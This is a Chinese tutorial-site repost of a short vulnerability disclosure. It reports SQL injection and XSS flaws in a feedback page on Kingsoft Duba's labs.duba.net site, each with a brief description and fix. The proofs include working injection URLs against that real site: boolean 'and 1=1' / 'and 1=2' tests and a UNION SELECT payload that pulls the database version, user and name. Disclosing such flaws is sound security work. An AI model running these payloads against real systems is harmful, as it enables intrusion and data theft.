手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >金山毒霸多个sql注入及XSS漏洞和修复
金山毒霸多个sql注入及XSS漏洞和修复
摘要:第一个简要描述:由于变量过滤不严产生SQL注入漏洞可通过入侵手段拿到站点权限详细说明:http://labs.duba.net/kws/fe...

第一个

简要描述:由于变量过滤不严产生SQL注入漏洞 可通过入侵手段 拿到站点权限

详细说明:http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2

漏洞证明:http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=1

http://labs.duba.net/kws/feedback2/his.php?uuid=622D988684F34161BC09E869DB38BF3B&app=2 and 1=2

结果明显不同 注入漏洞产生

修复方案:过滤变量app

第二个

简要描述:过滤不严导致存在SQL注入

详细说明:过滤不严导致存在SQL注入 有机会拿下服务器权限

漏洞证明:http://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5%20and%201=2%20union%20select%201,2,version(),4,5,user(),database(),8,9--

http://labs.duba.net/robots.txt

未作进一步测试

修复方案:过滤参数

第三个:

简要描述:留言处过滤不严 造成跨站漏洞

详细说明:留言处过滤不严 造成跨站漏洞

漏洞证明:http://labs.duba.net/kws/feedback2/his.php?uuid=12B70C061426AAA96F58AE431D180055&app=5

【金山毒霸多个sql注入及XSS漏洞和修复】相关文章:

dedecms 5.6的最新注入漏洞

最容易被忽略的五个开源软件安全漏洞

中国移动mas2.0平台系统漏洞暴光 附修复方法

关于XSS漏洞另一个攻击趋势

又拍图片管家支付非法充值的漏洞分析及修复方法(图)

TIBCO多个产品远程溢出漏洞

PunBB口令重置弱随机数绕过安全限制漏洞

Mozilla邮件客户端MIME外部主体堆溢出漏洞

Discuz! wap功能模块编码的注射漏洞

Symark PowerBroker 客户端多个本地命令溢出漏洞

精品推荐
分类导航